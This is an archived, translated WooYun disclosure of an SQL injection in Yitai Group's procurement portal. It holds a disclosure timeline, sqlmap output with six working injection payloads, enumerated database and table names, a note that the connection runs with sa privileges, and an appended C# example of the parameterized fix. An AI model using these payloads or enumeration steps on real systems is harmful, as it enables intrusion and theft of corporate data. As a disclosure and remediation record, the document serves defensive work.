WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-09-11: Details have been sent to the vendor and are awaiting vendor handling
2015-09-11: CNCERT (National Internet Emergency Center) has not yet been able to contact the relevant unit; details are disclosed only to the reporting agency
2015-09-21: Details disclosed to core white hats and experts in the relevant field
2015-10-01: Details disclosed to ordinary white hats
2015-10-11: Details disclosed to intern white hats
2015-10-26: Details disclosed to the public
Inner Mongolia Yitai Group Co., Ltd. is a large modern energy enterprise whose core business is coal production and trading, extended by railway transport and coal-to-liquids, and complemented by non-coal businesses such as real-estate development. The company has ranked among China's top 500 enterprises for ten consecutive years, placing 317th in 2014, and is 21st among China's top 100 coal enterprises and first among Inner Mongolia's top 50 coal enterprises. It currently has total assets of over 100 billion yuan and more than 7,600 employees, with 50 directly and indirectly controlled subsidiaries including Inner Mongolia Yitai Coal Co., Ltd., Inner Mongolia Yitai Zhundong Railway Co., Ltd., Inner Mongolia Yitai Huzhun Railway Co., Ltd., Inner Mongolia Yitai Coal-to-Liquids Co., Ltd., Synfuels China Technology Co., Ltd. and Inner Mongolia Yitai Real Estate Co., Ltd.; Inner Mongolia Yitai Coal Co., Ltd. is the first B+H-share listed company in the coal industry.
Injection point: http://**.**.**.**/notesReport/ViewInformation.aspx?key=865 (internal network; web server and database run on separate hosts)
sqlmap identified the following injection points with a total of 39 HTTP(s) requests:
---
Place: GET
Parameter: key
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: key=865 AND 1437=1437

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: key=865 AND 5939=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5939=5939) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: key=865 UNION ALL SELECT NULL,CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(110)+CHAR(84)+CHAR(89)+CHAR(69)+CHAR(80)+CHAR(82)+CHAR(70)+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: key=865; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: key=865 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: key=(SELECT CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4223=4223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [16]:
[*] DynamicsAx
[*] ECDev
[*] ECPecupm
[*] ECSupplierDataBase
[*] master
[*] model
[*] msdb
[*] ReportServer$SRM
[*] ReportServer$SRMTempDB
[*] SqlPersistenceService
[*] tempdb
[*] Tracking
[*] uupm
[*] wf
[*] Workflow
[*] YTDB

current database: 'ECDev'

Database: ECDev
[148 tables]
+-------------------------------------------------+
| BaseScoreWeight |
| CompetitionScoreTable_M3 |
| CompetitionScoreTable_M3 |
| CompetitionScoreTable_M4 |
| CompetitionScoreTable_P1P3 |
| D99_CMD |
| D99_REG |
| D99_Tmp |
| DTMP |
| EC_InformationTitel |
| EC_NotesReport |
| EC_TAuditAtta |
| EC_TBusinessLog |
| EC_TContractTableExtend |
| EC_TContractUploadFile |
| EC_TEvaluationReportExtend |
| EC_TInquiryBookExtend |
| EC_TOrderLetterUploadFile |
| EC_TPicketageAtta |
| EC_TPurchPlanTableExtend |
| EC_TPurchReqIniTableExtend |
| EC_TSuppInfoToProdClassChangeOrderAudit1 |
| EC_TTEMP_TEST1 |
| EC_TTenderLockLog |
| EC_TTenderQuestionDetailAttachment |
| EC_TTenderQuestionDetailAttachment |
| EC_TTenderQuestionTitle |
| EC_TTenderSuppApply |
| EC_tMail |
| EC_tMailType |
| EC_tParameters____delete |
| EC_tPriceMarket_20130426 |
| EC_tPriceMarket_20130426 |
| EC_tPricePurchase |
| EC_tPriceRegion |
| EC_tPriceSource |
| EC_tSuppProdCatalog |
| Ec_NoteAttach |
| Ec_SuppInfo_View |
| Ec_SuppProdCatalog_View |
| Ec_TTenderDepute |
| Ec_rDegree |
| Ec_tBusinessContactAttachment |
| Ec_tBusinessTypeForSuppSorce |
| Ec_tBusinessTypeForSuppSorce |
| Ec_tCompanyFinancerInfo |
| Ec_tExpertProfession |
| Ec_tExpertProfession |
| Ec_tFactoryBusinessType |
| Ec_tFrameworkAgreement |
| Ec_tFrameworkAgreementUploadFile |
| Ec_tLog |
| Ec_tPortalUserInfo_Bak |
| Ec_tPortalUserInfo_Bak |
| Ec_tProfession |
| Ec_tToDoList |
| FactoryInventory |
| ImgUpload |
| Interface_Log |
| JudgeWeightTable_M3 |
| JudgeWeightTable_M3 |
| JudgeWeightTable_M4 |
| JudgeWeightTable_P1P3 |
| Pcitc_UserInfo_View |
| PurchReqApproveOfLIYUEFENG_view |
| SendMsgLog |
| Sheet1$ |
| Sheet2$ |
| TPC_TABLE |
| Table_1 |
| TempInventoryForBalance |
| View_BiddingPrice |
| View_ContractAndOrderLetterBusinessIDPurchMajor |
| View_ContractAndOrderLetterDetailNew |
| View_ContractAndOrderLetterDetailNew |
| View_ContractAndOrderLetterDetailOldApply |
| View_ContractAndOrderLetterListNew |
| View_ContractAndOrderLetterListNew |
| View_Ec_tProdPurType |
| View_SupplyForBidding |
| YT_tCheckSeq |
| Yt_ReportAttachment |
| Yt_tPayType |
| Yt_tPurchaseAddress |
| Yt_tSeqConsignmentClosingApplyMain |
| Yt_tSeqForCheckApply |
| Yt_tSeqForCheckApply |
| Yt_tSeqForCheckAssign |
| Yt_tSeqForCheckNotice |
| Yt_tSeqForCheckProcess |
| Yt_tSeqForCheckReport |
| Yt_tSeqForCheckSpotCheck |
| Yt_tSeqForDeliveryCheckApply |
| Yt_tSeqForExchangeGoods |
| Yt_tSeqForFundPlan |
| Yt_tSeqForOverDueProcessM |
| Yt_tSeqForReceiveGoods |
| Yt_tSeqForReducePrice |
| Yt_tSeqForRejectGoods |
| Yt_tSeqForRepeatCheck |
| Yt_tSeqForSupplyApplyMain |
| Yt_tSeqForTransCheckApply |
| Yt_tSeqForTransCheckReport |
| Yt_tSeqForTrialInfo |
| Yt_tSeqPayOrder |
| 不含6$ |
| 伊泰准东铁路员工竞聘统计报表$ |
| 办公用品年计划$ |
| 工单描述$ |
| 总表$ |
| 成本中心$ |
| 承包商$ |
| 数据更改$ |
| 物料价格$ |
| 物料分类$ |
| 物料类别$ |
| 申请延期协议$ |
| 设备中心用途表$ |
| 设备号描述$ |
| 设备用途$ |
| 车辆年计划$ |
| 银行old$ |
| 银行信息$ |
| 销售价$ |
| abc |
| comd_list |
| contracttest |
| ec_tinquirybook_2012_8_2 |
| evaluationreport_2012_8_8_back |
| jiaozhu |
| pangolin_test_table |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| profiler_out_table |
| sqlmapoutput |
| sysdiagrams |
| tBulletin |
| tBulletinType |
| t_jiaozhu |
| tempevaluationreport |
| tempprod |
| tempusertable |
| user_temp_backup |
| view_CheckSginInfo |
| 税率替换 |
+-------------------------------------------------+

Database: ECDev
+-----------------------------------------------------+---------+
| Table | Entries |
+-----------------------------------------------------+---------+
| dbo.Ec_tLog | 813803 |
| dbo.EC_tSuppProdCatalog | 796897 |
| dbo.SendMsgLog | 395460 |
| dbo.TempInventoryForBalance | 332729 |
| dbo.Ec_SuppProdCatalog_View | 231560 |
| dbo.View_ContractAndOrderLetterDetailNew | 158158 |
| dbo.View_ContractAndOrderLetterDetailNew | 158158 |
| dbo.[银行old$] | 129495 |
| dbo.[银行信息$] | 129493 |
| dbo.view_CheckSginInfo | 116966 |
| dbo.View_ContractAndOrderLetterDetailOldApply | 111184 |
| dbo.[不含6$] | 88221 |
| dbo.View_Ec_tProdPurType | 75898 |
| dbo.EC_tPricePurchase | 57893 |
| dbo.tempprod | 52850 |
| dbo.View_ContractAndOrderLetterBusinessIDPurchMajor | 51250 |
| dbo.View_ContractAndOrderLetterListNew | 37513 |
| dbo.View_ContractAndOrderLetterListNew | 37513 |
| dbo.CompetitionScoreTable_P1P3 | 35499 |
| dbo.Ec_tPortalUserInfo_Bak | 34141 |
| dbo.Ec_tPortalUserInfo_Bak | 34141 |
| dbo.[设备号描述$] | 32726 |
| dbo.[物料价格$] | 25008 |
| dbo.[销售价$] | 24537 |
| dbo.Pcitc_UserInfo_View | 23960 |
| dbo.EC_TContractTableExtend | 17108 |
| dbo.[申请延期协议$] | 17040 |
| dbo.profiler_out_table | 10744 |
| dbo.[物料类别$] | 4573 |
| dbo.[物料分类$] | 4173 |
| dbo.DTMP | 3523 |
| dbo.EC_TInquiryBookExtend | 3493 |
| dbo.TPC_TABLE | 3323 |
| dbo.Ec_SuppInfo_View | 3206 |
| dbo.contracttest | 3096 |
| dbo.CompetitionScoreTable_M3 | 2626 |
| dbo.CompetitionScoreTable_M3 | 2626 |
| dbo.Ec_tExpertProfession | 2226 |
| dbo.Ec_tExpertProfession | 2226 |
| dbo.[设备用途$] | 1757 |
| dbo.EC_TTenderQuestionTitle | 1698 |
| dbo.[设备中心用途表$] | 1693 |
| dbo.EC_TSuppInfoToProdClassChangeOrderAudit1 | 1680 |
| dbo.EC_TContractUploadFile | 1614 |
| dbo.Ec_tFrameworkAgreement | 1409 |
| dbo.[伊泰准东铁路员工竞聘统计报表$] | 1236 |
| dbo.EC_TTenderQuestionDetailAttachment | 1026 |
| dbo.EC_TTenderQuestionDetailAttachment | 1026 |
| dbo.EC_tPriceMarket_20130426 | 1021 |
| dbo.EC_tPriceMarket_20130426 | 1021 |
| dbo.abc | 818 |
| dbo.EC_NotesReport | 731 |
| dbo.user_temp_backup | 584 |
| dbo.CompetitionScoreTable_M4 | 559 |
| dbo.tempusertable | 504 |
| dbo.[成本中心$] | 496 |
| dbo.tempevaluationreport | 489 |
| dbo.ec_tinquirybook_2012_8_2 | 368 |
| dbo.[办公用品年计划$] | 361 |
| dbo.View_BiddingPrice | 349 |
| dbo.evaluationreport_2012_8_8_back | 347 |
| dbo.Ec_TTenderDepute | 274 |
| dbo.Ec_tFactoryBusinessType | 270 |
| dbo.EC_TEvaluationReportExtend | 267 |
| dbo.EC_TTenderLockLog | 245 |
| dbo.EC_TPurchPlanTableExtend | 227 |
| dbo.Sheet2$ | 175 |
| dbo.Ec_NoteAttach | 160 |
| dbo.[承包商$] | 147 |
| dbo.EC_TPurchReqIniTableExtend | 144 |
| dbo.View_SupplyForBidding | 126 |
| dbo.EC_TAuditAtta | 118 |
| dbo.Ec_tBusinessContactAttachment | 87 |
| dbo.Ec_tToDoList | 75 |
| dbo.PurchReqApproveOfLIYUEFENG_view | 68 |
| dbo.JudgeWeightTable_M3 | 59 |
| dbo.JudgeWeightTable_M3 | 59 |
| dbo.Sheet1$ | 50 |
| dbo.[工单描述$] | 45 |
| dbo.FactoryInventory | 42 |
| dbo.EC_TOrderLetterUploadFile | 41 |
| dbo.JudgeWeightTable_P1P3 | 40 |
| dbo.Ec_tCompanyFinancerInfo | 32 |
| dbo.EC_tMail | 26 |
| dbo.Yt_tSeqPayOrder | 24 |
| dbo.pangolin_test_table | 23 |
| dbo.Yt_tPayType | 23 |
| dbo.[数据更改$] | 21 |
| dbo.pbcatedt | 21 |
| dbo.pbcatfmt | 20 |
| dbo.[车辆年计划$] | 18 |
| dbo.Yt_tSeqForFundPlan | 15 |
| dbo.JudgeWeightTable_M4 | 13 |
| dbo.Yt_tSeqForCheckReport | 13 |
| dbo.BaseScoreWeight | 11 |
| dbo.D99_Tmp | 10 |
| dbo.Ec_rDegree | 10 |
| dbo.Ec_tBusinessTypeForSuppSorce | 10 |
| dbo.Ec_tBusinessTypeForSuppSorce | 10 |
| dbo.YT_tCheckSeq | 8 |
| dbo.D99_CMD | 7 |
| dbo.jiaozhu | 7 |
| dbo.Yt_tPurchaseAddress | 6 |
| dbo.Yt_tSeqForSupplyApplyMain | 6 |
| dbo.ImgUpload | 5 |
| dbo.Yt_tSeqForOverDueProcessM | 5 |
| dbo.Ec_tProfession | 4 |
| dbo.Yt_tSeqForCheckProcess | 4 |
| dbo.EC_InformationTitel | 3 |
| dbo.Ec_tFrameworkAgreementUploadFile | 3 |
| dbo.EC_tMailType | 3 |
| dbo.tBulletin | 3 |
| dbo.tBulletinType | 3 |
| dbo.Yt_tSeqForCheckAssign | 3 |
| dbo.EC_TBusinessLog | 2 |
| dbo.EC_tPriceRegion | 2 |
| dbo.EC_tPriceSource | 2 |
| dbo.Yt_tSeqForCheckApply | 2 |
| dbo.Yt_tSeqForCheckApply | 2 |
| dbo.Yt_tSeqForCheckSpotCheck | 2 |
| dbo.Yt_tSeqForReceiveGoods | 2 |
| dbo.Yt_tSeqForReducePrice | 2 |
| dbo.税率替换 | 2 |
| dbo.[总表$] | 1 |
| dbo.D99_REG | 1 |
| dbo.EC_tParameters____delete | 1 |
| dbo.Yt_tSeqConsignmentClosingApplyMain | 1 |
| dbo.Yt_tSeqForDeliveryCheckApply | 1 |
| dbo.Yt_tSeqForExchangeGoods | 1 |
| dbo.Yt_tSeqForRejectGoods | 1 |
| dbo.Yt_tSeqForRepeatCheck | 1 |
| dbo.Yt_tSeqForTransCheckApply | 1 |
| dbo.Yt_tSeqForTransCheckReport | 1 |
+-----------------------------------------------------+---------+
At this point the connection runs with sa privileges and all sorts of things can be executed. The database sits on the .50 IP, while the website is on the .51 IP.
Because the web server and database are on separate hosts, the web root path is unknown, so no shell could be written and no direct privilege escalation was possible; this is where I stop. The entire database could still be dumped, though.
Proven above.
Filter the parameters properly.
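The following is an added example, not the vendor's code (which the report does not show), illustrating what "filter the parameters properly" means for an ASP.NET Web Forms page like the one at the injection point, and why the sa finding above matters even after the query is fixed. The page name ViewInformation, the query-string parameter key and the table EC_NotesReport come from the report; the columns NoteId, Title and Body, the GridView control NoteGrid and the connection-string name EcDevReadOnly are assumptions made for the example.

```csharp
// Added example: string-concatenated query (the shape the sqlmap findings
// imply) next to its parameterized, type-checked replacement.
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;
using System.Web.UI.WebControls;

public partial class ViewInformation : Page
{
    // Assumed control declared in ViewInformation.aspx.
    protected GridView NoteGrid;

    // Column names are assumptions; the table name is from the report.
    private const string NoteColumns = "Title, Body";

    // VULNERABLE pattern: the raw query-string value becomes part of the SQL
    // text, so "865 AND 1437=1437", "865; WAITFOR DELAY '0:0:5'--" and
    // "865 UNION ALL SELECT NULL,..." are all executed as SQL. Every
    // technique listed by sqlmap (boolean, error-based, UNION, stacked,
    // time-based, inline) follows from this one line.
    private DataTable LoadNoteUnsafe(string key)
    {
        string sql = "SELECT " + NoteColumns + " FROM EC_NotesReport WHERE NoteId = " + key;
        return Run(new SqlCommand(sql));
    }

    // HARDENED pattern: validate the type at the boundary (the key is an
    // integer id) and bind it as a typed parameter, so the value travels
    // separately from the query text and can never become SQL syntax.
    // No character "filtering" is needed or wanted; rejecting non-integers
    // is the whole validation.
    private DataTable LoadNoteSafe(string rawKey)
    {
        int noteId;
        if (!int.TryParse(rawKey, out noteId) || noteId <= 0)
            throw new ArgumentException("key must be a positive integer");

        const string sql = "SELECT " + NoteColumns + " FROM EC_NotesReport WHERE NoteId = @NoteId";
        var cmd = new SqlCommand(sql);
        cmd.Parameters.Add("@NoteId", SqlDbType.Int).Value = noteId;
        return Run(cmd);
    }

    // Shared executor. The report shows the application connecting as sa;
    // the assumed connection string "EcDevReadOnly" stands for a login that
    // only has read access to the tables this page needs, so that a future
    // injection cannot reach other databases, stacked statements that
    // modify data, or server-level procedures.
    private static DataTable Run(SqlCommand cmd)
    {
        string cs = ConfigurationManager.ConnectionStrings["EcDevReadOnly"].ConnectionString;
        using (var conn = new SqlConnection(cs))
        using (cmd)
        using (var adapter = new SqlDataAdapter(cmd))
        {
            cmd.Connection = conn;
            var table = new DataTable();
            adapter.Fill(table);
            return table;
        }
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        try
        {
            NoteGrid.DataSource = LoadNoteSafe(Request.QueryString["key"]);
            NoteGrid.DataBind();
        }
        catch (ArgumentException)
        {
            // Malformed key: answer 400 without touching the database.
            Response.StatusCode = 400;
            Response.SuppressContent = true;
            Context.ApplicationInstance.CompleteRequest();
        }
    }
}
```

LoadNoteUnsafe is kept only for contrast and is never called from Page_Load. The two changes that matter are the int.TryParse gate plus the SqlParameter in LoadNoteSafe, and the least-privilege login behind the connection string; together they address both the injection itself and the sa-level impact the report describes.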
Hazard level: High
Vulnerability Rank: 12
Confirmation time: 2015-09-11 16:15
CNVD has confirmed and reproduced the vulnerability as described, and has forwarded it via CNCERT to the Inner Mongolia branch centre, which will coordinate handling with the website's operating unit.
None yet